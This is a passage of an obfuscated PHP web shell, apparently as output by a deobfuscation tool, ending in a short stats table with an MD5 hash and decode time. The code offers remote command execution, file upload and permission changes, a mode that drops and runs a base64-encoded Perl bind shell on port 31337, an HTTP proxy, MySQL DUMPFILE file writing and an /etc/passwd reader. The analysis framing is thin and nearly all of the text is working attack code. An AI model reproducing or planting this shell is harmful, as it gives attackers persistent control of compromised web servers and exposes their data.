"\122\60\154\107\117\x44\154\150\x45\101\x41\121\101\107\x59\x41\x41\x43\110\65\x42\x41\x45\101\x41\x45\x73\x41\x4c\x41\x41\x41\x41\101\x41\x51\101\x42\x41\101\150\147\x41\x41\x41\102\x6c\x4f\x41\106\x67\x64\101\x46\101\x41\101\x49\131\103\x55\167\101\70\132\167\x41\70\x5a\x39\x44\x59\x34\112\x49\103" . "\x57\x76\x2f\x2f\57\167\x43\111\x57\102\105\x32\101\x41\101\x79\x55\x4a\x69\x63\x71\111\x53\x48\x6c\64\x43\101\101\x50\104\x34\x2f\x2b\x44\x67\x38\120\130\x36\57\x35\117\130\160\114\67\x48\x30\x2b\x2f\x32\x2f\x61\x47\155\x73\124\111\x79\x4d\x74\124\x63\x35\120\x2f\57\163\x66\114\65\57\x38\130\106" . "\110\147\102\x59\x70\x77\102\125\x6c\147\102\x57\156\61\102\x51\101\x47\x38\141\x49\x41\102\121\150\122\142\146\155\x77\104\x63\x6b\166\53\110\61\x31\x6e\157\165\105\114\154\x72\151\172\151\x70\x66\x2b\126\63\x6e\x50\101\57\64\x30\103\x55\172\155\x6d\x2f\x77\x41\64\x58\x68\126\104\x41\101\x47\104" . "\125\171\x57\x64\x2f\x30\x69\164\x2f\x31\x75\x31\x2f\x33\x4e\x7a\101\120\71\65\60\120\x39\x39\60\155\117\65\57\x37\x76\x31\64\x59\172\166\x7a\130\x4c\x72\167\157\130\x49\57\x35\x76\123\57\67\x44\x6b\x2f\167\102\x58\x6f\166\71\163\x79\x76\122\152\167\117\150\141\164\x51\x43\x48\x56\61\67\x70" . "\165\157\x30\x47\x55\x51\x42\127\x6e\x50\53\53\70\114\x6d\x35\101\120\53\152\65\121\x42\x55\154\x41\x43\x4b\x57\147\x41\x34\142\x6a\112\121\101\x41\x41\101\101\101\101\101\x41\101\101\101\101\x41\101\101\x41\x41\101\x41\101\101\x41\x41\x41\101\x41\101\101\101\101\101\101\x41\x41\x41\x41\x41\x41\x41" . "\x41\x41\101\101\x41\x41\101\x41\101\x41\x41\x41\101\101\x41\101\x41\x41\101\101\101\101\101\x41\101\x41\x41\101\x41\x41\101\x41\101\101\x41\x41\101\x41\101\101\x41\101\x41\101\x41\101\101\101\x41\x41\101\x41\x41\x41\101\x41\x41\101\101\101\x41\x41\101\101\x41\x41\x41\x41\101\101\x41\101\x41\x41\x41\x41" . "\101\x41\x41\x41\101\101\x41\101\x41\101\x41\101\101\101\x41\101\101\x41\101\101\x41\x41\101\x41\101\101\x41\101\x41\x41\101\x41\x41\x41\x41\101\101\x41\101\x41\101\101\101\x41\x41\x41\x41\x41\x41\x41\101\101\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\101\101\101\x41\101\x41\x41\101\101\101\101\x41\101" . "\x41\101\101\x41\x41\x41\x41\101\101\x41\x41\x41\x41\x41\x41\x41\x41\101\x41\101\x41\x41\x65\145\x67\101\113\x43\147\64\123\x46\123\170\131\116\x45\x77\x34\x67\x4d\x67\123\x4f\152\x34\70\x44\x46\x41\x63\x48\x45\125\111\132\x52\x45\131\157\x4a\104\x51\172\120\x54\64\x2f\101\x77\143\121\103\x51\153\x67" . "\x47\x77\x69\x70\161\x71\153\x71\x41\x78\111\141\x46\x52\x67\130\x44\167\x4f\x31\x74\x72\143\101\x75\142\161\x37\166\x49\145\x4a\104\x69\x77\x68\x42\x63\120\105\x78\x41\171\124\x6c\x53\105\132\117\172\157\65\113\x54\125\170\x4d\x43\163\x76\x44\x4b\x4f\x6c\123\x52\163\x63\110\x44\x77\145\x48\153\115\x64" . "\x48\125\x63\115\x72\67\x47\172\102\165\x66\x6f\66\x41\171\x38\x37\x4c\165\x2b\151\x69\x30\146\x41\146\120\x30\71\x41\x76\111\x45\x52\70\x5a\x4e\x6a\x63\x34\x51\x53\125\x6d\124\x6f\x67\x59\x73\x63\102\141\101\151\x56\106\x6b\x43\150\131\x79\x42\103\111\x69\x77\130\153\132\104\x32\157\x52\x33\x46\x42" . "\165\64\164\x4c\101\x67\x45\x41\x4f\x77\x3d\75", "\x65\170\164\137\164\x78\x74" => "\151\x56\x42\117\122\167\60\113\107\147\x6f\x41\x41\x41\101\x4e\x53\x55\x68\x45\125\x67\101\101\x41\x42\x41\101\x41\101\x41\121\x43\101\x59\x41\101\101\x41\x66\70\x2f\x39\x68\x41\x41\101\x41\x43\130\102\x49\127\x58\x4d\x41\101\101\x73\x54\x41\101\101\114\105\x77\x45\x41\155\160\x77\x59\x41\x41\x41\101\102\107\144\102\124\125\x45\x41\101\x4c\x47\x4f\146\x50\x74\122\x6b\167\101\101\101\103\102\152\123\106\x4a\116\101\x41\102\x36\x4a\x51\101\101\x67\111\115\x41\x41\120\156\57\101\101\103\101\66\x51\101\x41\x64\124\101\x41\x41\117\160\147\x41\x41\x41\66\155\101\x41\101\x46\62\x2b\x53\x58\70\126\x47\x41\x41\101\x43\155\x30\154\105\121\x56\x52\64\x32\x6d\x4c\x73\x37\x2b\x2f\57\x7a\x30\x41\102\101\101\x68\101\143\122\x7a\x62\x41\101\152\104\x41\x42\x44\70\147\x70\x58\x59\x79\x36\x4f\64\x5a\170\x4b\x57\121\103\x78\x41\124\x55\165\102\x34\x2b\101\x34\x67\x6c\104\x38\x53\x54\57\x39\151\101\x6a\x72\x33\166\x44\157\142\x49\144\x7a\145\141\116\105\152\x6e\70\x70\x43\x56\x59\x63\x71\x7a\x48\x71\x32\x4a\x50\143\116\x54\x6d\x58\x47\x56\x58\x6c\105\x30\x41\163\x4d\112\x50\x4d\126\x5a\153\x5a\x2f\x6a\x4d\x77\x4d\x39\x68\157\163\x44\104\70\101\67\162\x70\x48\171\115\124\167\65\57\x50\x37\170\x69\x2b\120\x6e\x2f\x43\x77\103\x77\x69\x7a\143\x44\105\x78\x63\120\x77\71\71\x64\166\150\x72\71\x41\x79\124\71\57\57\x38\x4a\144\101\x42\x42\x41\143\x41\x4d\x45\x75\112\x6d\147\x4c\103\x67\116\x4e\x4f\124\x50\x36\x30\x6b\115\104\x44\171\143\104\x4a\70\x66\x79\152\x43\x77\x4b\132\153\x78\x63\x45\161\162\x4d\120\172\71\57\x5a\120\x68\57\63\53\x34\x4e\x67\x61\101\x41\107\x4c\102\x35\x69\x39\x51\x6f\x50\x78\x2b\144\64\x6d\102\x38\x56\x63\166\x41\x2b\x73\110\x42\x67\142\x6d\102\64\x34\x4d\120\x36\127\x4e\107\132\152\53\57\x47\146\x34\x42\70\x4c\x2f\57\x6a\107\167\143\x55\x44\125\x41\147\121\121\x45\x31\131\104\57\147\x47\x4a\114\x2f\x4d\131\127\102\155\x2f\115\146\x79\67\x79\x38\114\167\x6d\61\x75\x50\x67\x55\116\x65\x69\x2b\110\57\156\61\x39\x41\x32\57\x38\x7a\57\x45\130\171\x41\153\101\x41\163\x57\x43\x7a\x2f\145\x2f\x48\x57\x77\170\x4d\166\x33\x63\171\115\110\170\x57\x59\120\152\171\123\132\x53\102\x79\x54\171\103\x67\132\110\x68\110\71\150\x6d\153\107\141\121\111\x54\101\x41\x45\x45\x43\x59\102\x67\101\x4e\57\57\x39\x68\115\x51\x4d\162\115\x78\x76\104\x76\67\144\103\x44\x44\71\154\57\122\151\64\x35\130\125\x5a\57\166\x33\x36\x42\147\x7a\x41\146\x77\171\115\x6a\x49\x77\x4d\x7a\x4d\172\115\x63\120\125\x41\101\121\124\x33\101\163\150\125\153\115\166\x2f\146\x72\156\104\167\x4d\x78\66\101\x78\x67\111\x71\x67\x7a\x66\x76\151\x6f\x77\x73\117\162\66\147\60\121\x68\x69\160\155\x59\147\103\67\64\x68\x32\x49\150\121\101\104\102\130\146\104\71\53\x77\x2b\147\66\x61\167\x4d\124\x4a\x2f\x32\115\114\x43\171\103\104\104\70\53\x38\152\111\x38\112\61\142\147\64\x46\142\x51\160\156\150\110\x7a\x44\x6b\146\167\x4c\124\101\x55\x6a\x4e\152\x78\x2b\57\x47\x54\147\64\127\x42\156\64\x2b\x50\x6a\101\x2b\147\101\x43\103\117\x45\x46\131\114\x7a\57\x2b\x2f\141\x4d\147\x65\130\156\x4b\x77\131\x47\144\x69\127\107\x72\65\70\x2f\x4d\146\170\x58\x63\x6d\120\x34\70\166\x55\67\x77\x2f\143\166\156\170\156\53\x2f\120\156\104\70\101\x75\131\x44\x6b\x44\150\x38\120\166\x33\x4c\67\x67\x32\147\101\103\x43\107\x38\101\x45\x39\x42\x63\157\152\x76\x38\171\x6d\x54\114\70\x2f\x2f\x53\124\x34\143\63\146\x54\x30\103\104\122\102\x6a\x2b\146\x66\147\x49\x39\x76\145\146\120\63\x38\132\114\154\60\66\x43\71\143\x49\131\167\x4d\x45\x45\115\x49\101\x6f\x50\x2b\x2b\57\x2f\x72\110\143\120\x76\121\x4a\121\x5a\x68\122\124\60\107\x42\153\x56\110\102\x69\x5a\147\x66\x4c\113\167\115\101\x4f\144\172\x41\65\125\x77\121\x35\x57\x46\170\x34\145\x44\161\132\x42\171\x62\151\x77\163\106\x41\x59\111\x49\x41\121\102\152\x41\171\x4d\x4c\x42\170\70\152\x49\111\113\150\163\x79\70\x47\x6d\132\101\x36\x4d\x4e\155\114\103\x42\147\x70\x79\143\67\x41\171\163\162\113\x78\x41\57\63\x2b\x44\62\167\x37\x56\x7a\101\x55\113\x4f\x6f\101\x41\x67\x68\166\101\x77\163\x7a\x45\167\x43\111\161\170\141\x41\x4b\170\x4e\x67\x41\x46\170\143\x33\x73\155\131\127\x57\x4e\x51\101\x42\x42\x41\x4c\x54\112\x42\x59\x67\113\x77\x5a\x42\x41\x41\103\104\x41\x41\x4b\127\146\164\x76\x48\125\x54\x41\x6b\147\101\101\x41\101\x42\x4a\x52\125\x35\x45\162\153\112\x67\147\x67\75\75"); goto rRUEz; BcLrB: if ($_POST["\155\x6f\144\x65"] == "\142\151\156\x64") { chdir($dir); $os = substr(strtoupper(PHP_OS), 0, 3); $port = 31337; $txt = base64_decode("\111\x79\105\166\x64\x58\116\171\114\62\112\160\x62\151\71\x77\x5a\130\112\163\x44\121\160\61\143\x32\x55\x67\125\x32\71\152\x61\x32\126\60\x4f\171\101\116\103\x6e\x56\x7a\132\123\x42\x47\x61\127\x78\154\x53\x47\106\165\132\107\170\154\117\x79\101\x6a\x49\110\x42\x6c\x63\x69\102\x73\x4a\62\106\x31\144\107\x39\155\142\110\x56\x7a\141\101\x30\x4b\x4a\107\61\x68\x65\x46\71\152\x62\62\x35\x75\x50\x54\x45\167\x4f\167\60\113\x4a\110\102\166\x63\156\122\150\x58\x32\170\x76\x59\62\106\163\x5a\x54\x30\x6b\121\126\112\x48\126\154\x73\x77\130\x54\x73\116\x43\x69\x52\172\x65\x58\115\147\x50\123\101\x6b\x51\126\x4a\x48\x56\x6c\x73\170\x58\124\x73\116\x43\x6d\154\155\111\x43\147\153\x63\x33\x6c\172\x49\x47\126\x78\111\x43\112\x4d\x53\125\x34\151\x4b\123\x42\x37\111\103\x52\152\142\127\121\x67\x50\x53\x41\x69\x4c\62\x4a\160\142\x69\x39\151\131\130\x4e\x6f\x49\152\x73\x67\x66\x51\60\x4b\x61\x57\131\147\113\103\x52\x7a\x65\130\x4d\147\x5a\x58\105\147\111\x6c\144\x4a\x54\151\x49\160\111\x48\163\x67\x4a\107\x4e\164\132\x43\x41\x39\x49\103\112\x44\117\x6c\x78\143\x64\x32\154\x75\132\x47\x39\x33\x63\61\x78\x63\143\63\x6c\x7a\x64\107\126\164\115\x7a\x4a\143\x58\x47\116\164\132\x43\65\154\x65\107\x55\151\x4f\171\x42\71\104\121\x6f\153\143\x47\106\x6b\x5a\110\x4a\146\x62\x47\x39\152\131\127\x78\154\120\130\x42\x68\x59\x32\x74\146\x63\62\x39\x6a\141\x32\x46\153\x5a\110\112\146\x61\x57\x34\x6f\x4a\110\102\166\x63\156\122\150\130\x32\x78\166\131\62\x46\x73\x5a\x53\x78\112\x54\x6b\106\105\122\106\112\146\121\125\x35\132\x4b\x54\163\116\103\156\x4e\166\x59\62\164\154\x64\x43\x68\124\122\126\112\x57\114\105\106\107\130\x30\154\117\122\x56\121\163\125\60\x39\x44\123\61\x39\x54\x56\x46\x4a\x46\x51\125\x30\x73\112\63\x52\x6a\143\103\x63\x70\111\110\170\70\111\x47\122\x70\x5a\x53\x67\x69\122\x58\112\171\142\63\112\x6c\117\151\x41\153\x49\123\111\x70\x4f\x79\101\x67\111\63\x4e\154\x63\x6e\132\154\143\151\x31\172\142\62\x4e\x72\132\130\121\116\x43\156\x4e\x6c\144\x48\x4e\166\131\x32\164\x76\x63\110\121\x6f\x55\x30\126\x53\x56\x69\x78\124\124\x30\x78\x66\x55\60\x39\104\123\x30\126\125\114\x46\x4e\120\x58\61\x4a\x46\x56\126\x4e\x46\121\x55\122\x45\x55\x69\x77\170\x4b\123\x42\x38\x66\103\x42\x6b\x61\127\x55\x6f\111\153\126\x79\x63\155\x39\171\132\124\x6f\x67\112\103\x45\x69\113\124\163\116\103\155\112\160\x62\155\121\x6f\x55\x30\126\x53\126\x69\167\x6b\143\107\106\153\132\x48\x4a\146\x62\107\71\x6a\x59\127\170\154\x4b\x53\x42\x38\146\103\x42\153\141\127\125\x6f\x49\x6b\x56\x79\x63\155\x39\x79\132\124\157\x67\x4a\x43\105\x69\x4b\x54\163\116\x43\155\170\x70\x63\x33\122\154\142\x69\150\124\122\126\112\127\x4c\103\122\164\x59\x58\150\146\x59\62\71\x75\142\x69\x6b\x67\146\x48\x77\x67\x5a\x47\154\154\x4b\x43\112\x46\143\156\112\166\x63\x6d\x55\x36\111\103\x51\x68\111\x69\153\67\104\121\160\x74\x65\123\101\x6b\143\x47\106\x6b\x5a\x48\x4a\146\x63\x32\154\165\132\172\x31\150\x59\62\x4e\154\143\110\121\x6f\x55\60\154\x4f\122\171\167\x67\x55\60\x56\x53\126\151\x6b\x37\x49\x43\x4e\x68\x59\x32\x4e\x6c\144\x48\122\x76\111\x47\x78\x68\111\x47\116\166\x62\x6d\65\154\x63\x33\116\x70\x62\62\x35\154\111\x47\x52\x68\142\103\x42\x6a\142\107\154\154\142\x6e\121\x4e\103\x6d\x31\65\x4b\103\x52\172\141\127\x35\x6e\x58\x33\102\x76\143\x6e\122\x68\x4c\103\x52\x7a\x61\127\65\x6e\x58\x32\x46\x6b\132\110\x49\163\x4a\107\144\x6c\x64\103\153\71\x64\x57\x35\167\x59\x57\x4e\x72\130\63\116\166\x59\x32\x74\150\132\x47\122\x79\130\x32\154\165\x4b\103\122\x77\131\x57\x52\153\143\154\x39\172\x61\127\x35\x6e\113\x54\x73\x4e\103\x6c\x4e\112\124\153\143\x74\x50\x6d\106\x31\144\107\71\155\142\x48\x56\x7a\x61\x43\x67\x70\117\167\x30\x4b\x62\x33\102\x6c\x62\x69\150\124\126\105\x52\112\124\x69\167\147\111\152\64\x6d\x55\60\154\117\x52\171\111\160\x4f\167\x30\113\x62\63\x42\154\142\x69\x68\x54\x56\105\122\x50\x56\x56\121\x73\x49\x6a\64\x6d\125\x30\x6c\x4f\x52\x79\x49\160\x4f\167\x30\113\142\63\102\x6c\142\151\150\124\126\105\x52\x46\125\154\x49\163\x49\152\64\x6d\x55\x30\154\x4f\x52\x79\x49\x70\x4f\167\x30\x4b\143\x48\112\160\142\x6e\121\x67\x49\151\x30\164\114\123\60\x74\x4c\x53\x30\164\114\x53\x30\164\114\123\x30\x74\114\123\60\x74\114\x53\x30\164\x4c\123\60\x74\114\123\60\164\x4c\x53\x30\x74\x4c\123\x30\x74\114\x53\x30\x74\x4c\x53\60\164\x4c\126\x78\165\x49\x6a\163\116\x43\156\102\171\x61\127\65\x30\x49\x43\111\x67\103\123\x30\71\111\x45\x4a\160\142\x6d\x51\147\125\x32\150\154\142\107\x77\147\121\155\x46\152\x61\x32\122\x76\x62\x33\x49\x67\x50\x53\60\x4a\130\x47\64\151\117\x77\x30\113\x63\x48\x4a\160\142\x6e\121\147\111\x69\60\164\x4c\x53\x30\164\x4c\123\60\164\114\123\x30\x74\x4c\x53\x30\x74\114\x53\60\x74\x4c\x53\60\x74\x4c\123\x30\x74\x4c\x53\60\x74\114\x53\x30\x74\114\123\x30\x74\x4c\x53\x30\164\x4c\x53\x30\x74\114\126\x78\165\111\152\163\116\103\156\102\171\141\x57\x35\x30\111\103\x49\x67\x52\107\x56\60\132\x57\116\60\x5a\x57\x51\x67\143\62\150\x6c\x62\107\167\x36\111\103\x52\x6a\142\127\x51\x4a\103\x56\x78\165\111\x6a\163\x4e\x43\x6e\x42\171\x61\x57\x35\x30\111\103\x49\164\114\x53\60\x74\114\x53\60\164\x4c\x53\60\x74\x4c\x53\60\x74\x4c\x53\60\x74\x4c\123\60\x74\114\x53\60\x74\x4c\x53\60\x74\x4c\x53\x30\x74\x4c\123\x30\x74\114\x53\60\164\x4c\123\x30\164\114\x53\x31\x63\142\x6c\x78\x75\111\x6a\x73\116\x43\155\x56\x34\x5a\x57\x4d\x6f\x4a\x47\x4e\164\132\103\153\x37\x44\x51\x70\x6a\142\107\x39\172\132\123\150\124\x53\125\x35\110\113\124\x73\x3d"); fwrite(fopen("\142\151\x6e\144\56\160\x6c", "\x77\x2b"), $txt); exa("\160\145\162\154\40\142\x69\156\x64\x2e\160\x6c\x20" . $port . "\x20" . $os); unlink("\x62\151\156\x64\56\160\154"); } goto y_4Tz; ogY64: function pari($num) { return $num % 2 == 0 ? TRUE : FALSE; } goto KDbB3; Sx0I4: echo isset($_COOKIE[mysql_pass]) ? $_COOKIE[mysql_pass] : "\x70\141\163\x73"; goto Woc_w; Woc_w: ?>
" />
<input type="text" name="host" size="10" value="<?php goto o_REo; pjlqu: ?>
of <?php goto wJg_X; niQR0: $uname = php_uname(); goto zKRhl; J4lso: echo $uname; goto n9akO; J2Xxt: if ($_POST["\155\x6f\144\145"] == "\x63\150\155\x6f\x64") { chdir($dir); chmod($_POST[filename], intval($_POST[filemode], 8)) or die("\x63\141\x6e\156\157\x74\40\x63\x68\141\156\x67\145\x20\146\151\154\145\40\155\157\x64\145"); $output = "\x4d\157\x64\x65\x20\143\x68\x61\x6e\147\x65\144\41"; } goto lufJS; c0I31: ?>
<br>
Name: <?php goto vBtyR; MXWZj: ?>
<html>
<head>
<style type="text/css">
body {background-color:#000000; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; color:#FFFFFF;}
.link {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#FFFFFF; font-weight:bolder; text-decoration:underline;}
.header {
font-size: 24px;
font-weight: bold;
}
td#info {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#000000; font-weight:bold}
td {
font-size:12px;
}
.Stile1 {
color: #0099FF;
font-weight: bold;
}
input {
background-color: #0066FF;
border:#FFFFFF 2px solid;
color:#FFFFFF;
font-family:Verdana;
font-size:10px;
}
textarea {
background-color: #0066FF;
border:#FFFFFF 2px solid;
color:#FFFFFF;
font-family:Verdana;
font-size:10px;
}
select {
background-color: #0066FF;
border:#FFFFFF 2px solid;
color:#FFFFFF;
font-family:Verdana;
font-size:10px;
}
.Stile2 {color: #FF0000}
.Stile4 {color: #FFFFFF}
</style>
<title><?php goto g2uxT; gL0Qn: ?>
';document.folder.submit();">Home</a> - <a class="link" href="javascript:document.tools.nometool.value='passwd';document.tools.submit();">Cat /etc/passwd</a> - <a class="link" href="javascript:document.tools.nometool.value='encoder';document.tools.submit();">Encoder</a> - <a class="link" href="javascript:document.tools.mode.value='phpinfo';document.tools.submit();">PHPInfo</a> - <a class="link" href="javascript:document.tools.nometool.value='scanner';document.tools.submit();">ShellScan</a> - <a class="link" href="javascript:document.tools.nometool.value='proxy';document.tools.submit();">Proxy</a> </div>
<br>
Directory:</span>
<?php goto kwJny; bsTlP: $totalspace = disk_total_space($dir); goto viyX4; b0O3e: $auf_off_msg = "\74\146\x6f\156\164\40\143\157\154\157\162\x3d\x72\x65\x64\x3e\x41\x6c\154\x6f\167\40\x55\x52\x4c\x20\x46\x6f\x70\x65\156\x3a\x20\x4f\106\x46\x3c\x2f\x66\157\x6e\x74\76\x3c\142\162\x20\x2f\x3e"; goto I41_y; R93p7: echo $_SERVER["\123\105\122\126\105\122\x5f\x53\117\x46\x54\x57\x41\x52\x45"]; goto CJZdX; s5L8R: if ($_POST["\x6d\157\144\x65"] == "\x70\162\157\170\x79\163\x75\x72\x66") { $output = "\74\146\157\162\x6d\40\x6d\x65\x74\x68\x6f\x64\75\42\160\157\163\x74\x22\x20\x61\x63\x74\151\x6f\x6e\75\42\x23\x22\76\x75\x72\x6c\x3a\40\x3c\x69\156\160\165\164\x20\x6e\x61\x6d\x65\x3d\x22\x75\162\x6c\42\x20\x74\x79\160\x65\75\42\x74\x65\x78\x74\x22\x20\163\151\x7a\x65\75\42\65\60\x22\40\57\x3e\12\x9\x9\x9\x20\74\151\x6e\160\x75\x74\x20\x74\x79\x70\145\x3d\42\163\x75\x62\x6d\x69\x74\42\40\x76\141\x6c\165\x65\75\x22\x73\x75\x72\146\x22\x20\57\x3e\40\12\11\11\x9\x20\x3c\x69\x6e\x70\x75\x74\40\x6e\141\x6d\145\75\x22\143\x75\162\x6c\42\x20\x74\x79\160\x65\75\x22\143\x68\x65\x63\x6b\142\157\170\x22\40\151\x64\75\x22\143\x75\x72\x6c\42\40\166\141\x6c\165\145\x3d\42\x63\x75\162\154\42\40\x2f\76\xa\11\x9\11\40\165\163\x65\40\x63\x75\x72\x6c\40\x3c\151\x6e\160\x75\x74\x20\x6e\141\x6d\145\x3d\x22\146\157\160\x65\156\42\40\164\x79\160\x65\75\42\x63\x68\x65\143\x6b\142\x6f\x78\42\x20\151\x64\x3d\42\146\x6f\x70\x65\x6e\x22\x20\166\x61\x6c\x75\x65\x3d\x22\x66\157\160\x65\156\42\40\x2f\76\x20\x75\x73\x65\40\146\x6f\160\x65\156\x3c\142\162\x20\57\x3e\40\74\151\156\x70\165\x74\x20\x74\x79\x70\x65\75\x22\x68\x69\144\144\145\x6e\x22\x20\156\141\x6d\x65\x3d\42\x6d\157\x64\x65\x22\40\x76\x61\x6c\x75\145\x3d\42\x70\x72\x6f\x78\x79\163\x75\x72\x66\42\40\x2f\76\xa\x9\x9\x9\x20\x3c\x2f\146\157\x72\155\76\74\142\162\40\57\x3e\74\x62\162\40\x2f\76"; if (!$_POST[curl] && !$_POST[fopen]) { $dirz = ''; $u = parse_url($_POST[url]); $host = $u["\150\x6f\163\x74"]; $file = !empty($u["\x70\x61\164\x68"]) ? $u["\160\141\164\x68"] : "\57"; if (substr_count($file, "\57") > 1) { $dirz = substr($file, 0, strpos($file, "\57")); } $url = @fsockopen($host, 80, $en, $es, 12); if (!$url) { die("\x3c\x62\x72\x3e\x20\103\141\156\x20\x6e\x6f\164\x20\x63\x6f\x6e\156\x65\143\x74\x20\x74\157\40\150\x6f\x73\164\41"); } fputs($url, "\x47\x45\x54\x20\x2f{$file}\40\x48\x54\124\120\57\61\x2e\60\xd\12\x41\x63\x63\145\160\164\55\x45\156\143\x6f\x64\x69\x6e\x67\x3a\40\x74\145\170\164\xd\xa\110\157\163\164\x3a\x20{$host}\xd\xa\x52\x65\x66\145\162\145\x72\x3a\x20{$host}\xd\12\x55\163\x65\162\x2d\101\x67\x65\x6e\164\72\40\115\157\172\151\154\154\x61\57\65\x2e\60\x20\11\11\11\11\11\x28\x63\x6f\x6d\x70\141\164\151\142\154\x65\73\x20\x4b\x6f\x6e\x71\165\x65\x72\x6f\162\57\63\x2e\x31\73\40\106\162\x65\145\x42\x53\x44\x29\15\xa\15\12"); while (!feof($url)) { $con = fgets($url); $output .= $con; } fclose($url); } else { if ($_POST[curl]) { ob_clean(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_POST[url]); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); ob_end_flush(); } else { if ($_POST[fopen]) { $file = file($_POST[url]); foreach ($file as $line) { $output .= $line; } } } } } goto J2Xxt; lNz2p: if ($_POST["\155\157\x64\145"] == "\x6d\153\144\x69\162") { chdir($dir) or die("\x45\x72\162\157\162\x2e"); if (mkdir($_POST["\155\153\144\151\162"])) { $output = "\104\151\162\145\143\x74\157\162\171\40\143\x72\x65\141\164\145\x64\56"; } } goto ZtUEj; woJ0y: echo phpversion(); goto MzI8V; u7SBB: echo $safemode; goto QKbCa; MzI8V: ?>
<br>
Address: <?php goto wgueM; tB_ou: ini_get("\162\x65\147\151\x73\164\145\x72\137\147\154\x6f\142\x61\x6c\x73") == 1 ? $reglobals = $reglobals_on_msg : ($reglobals = $reglobals_off_msg); goto XmImr; VTVhz: ini_set("\155\x65\155\157\162\171\x5f\154\151\x6d\x69\x74", "\x31\x30\x30\x30\115"); goto J8nqh; YW3ht: echo $_SERVER["\122\x45\x4d\117\x54\x45\137\x41\x44\104\x52"]; goto KhM9W; fGQOC: ?>
</td>
</tr>
</table>
</body>
</html>
<?php goto NxT89; lm7Nb: if (substr($dir, -1) != DIRECTORY_SEPARATOR) { $dir .= DIRECTORY_SEPARATOR; } goto ffIPu; eRXYx: $freespace = intval($freespace / 1024 / 1024 / 1024); goto xH0Kk; A5MIx: echo $output; goto fGQOC; aOJ_p: if ($_POST["\x6d\x6f\144\145"] == "\165\x70\154\x6f\141\x64\x32") { $percorso = $_FILES["\155\x79\146\151\154\x65"]["\x74\x6d\x70\x5f\x6e\x61\x6d\x65"]; $nome = $_FILES["\155\x79\146\151\154\145"]["\156\x61\155\x65"]; if (!move_uploaded_file($percorso, $dir . $nome)) { $output = "\x3c\x66\x6f\156\x74\x20\143\x6f\x6c\157\162\75\162\145\144\x3e\103\141\x6e\x6e\x6f\164\x20\165\x70\x6c\x6f\x61\144\x3c\57\x66\157\156\x74\76"; } else { $output .= "\74\x62\x72\x3e\74\x62\162\x3e{$nome}\x20\x48\x61\163\40\x42\145\x65\156\40\123\141\x76\145\144\x21"; } } goto x6Xi4; xH0Kk: $totalspace = intval($totalspace / 1024 / 1024 / 1024); goto a14x1; CJZdX: ?>
<br>
Free <?php goto hKDLx; fTbem: $auf_on_msg = "\x3c\146\x6f\x6e\164\x20\143\x6f\154\x6f\162\75\147\x72\x65\145\x6e\x3e\101\x6c\x6c\x6f\x77\40\x55\x52\x4c\x20\x46\x6f\x70\145\x6e\72\x20\117\x4e\74\57\x66\157\x6e\164\x3e\x3c\x62\162\x20\x2f\x3e"; goto b0O3e; OA1M9: echo $percentfree; goto DJSeR; WM1_5: if ($_POST["\155\157\x64\145"] == "\160\150\x70\151\156\x66\x6f") { phpinfo(); die; } goto WzUtG; hdKVK: ?>
)<br>
Software: <?php goto R93p7; l39TP: ?>
" />
<input name="dbname" type="text" value="<?php goto wPR2p; Pz8cq: echo isset($_COOKIE[mysql_user]) ? $_COOKIE[mysql_user] : "\x75\163\x65\162"; goto UDURP; az06a: if ($_POST["\x6d\x6f\144\145"] == "\143\155\x64") { chdir($dir); $res = exa(stripslashes($_POST[cmd])); $output = $res; } goto aOJ_p; jTav2: ?>
<?php goto Wglr0; czAlQ: ini_get("\x6d\x61\147\151\143\x5f\161\165\x6f\164\145\x73\137\147\160\143") == 0 ? $gpc = $gpc_off_msg : ($gpc = $gpc_on_msg); goto dTS_Y; mupTn: ?>
<br>
Uname -a: <?php goto J4lso; ihQrV: echo $dir; goto NJm6N; l68qU: if ($_POST["\x6d\x6f\x64\x65"] == "\163\x71\154\167\x72\151\x74\145\146\x69\154\x65") { $link = mysql_connect($_COOKIE["\155\171\163\161\x6c\x5f\150\x6f\163\164"], $_COOKIE["\155\x79\163\x71\154\x5f\x75\163\145\162"], $_COOKIE["\155\171\163\x71\154\137\x70\141\x73\163"]) or die(mysql_error()); $db = mysql_select_db($_COOKIE["\x6d\x79\163\x71\154\x5f\156\141\155\x65"]); $path = $_POST["\x70\x61\x74\150"]; $content = $_POST["\156\x65\167\x74\145\x78\x74"]; $txt = bin2hex($content); $query = "\123\105\x4c\105\x43\x54\x20\x30\170{$txt}\40\111\x4e\124\117\x20\104\125\115\120\106\x49\114\x45\40\x27{$path}\47\73"; $res = mysql_query($query) or die(mysql_error()); $output = $path . "\x20\x73\x61\166\145\x64\x21"; } goto MLz8Y; hKDLx: echo $freespace; goto pjlqu; juKuz: ?>Function Calls
| None |
Stats
| MD5 | f57850b29a71f20005d67913273a2891 |
| Eval Count | 0 |
| Decode Time | 198 ms |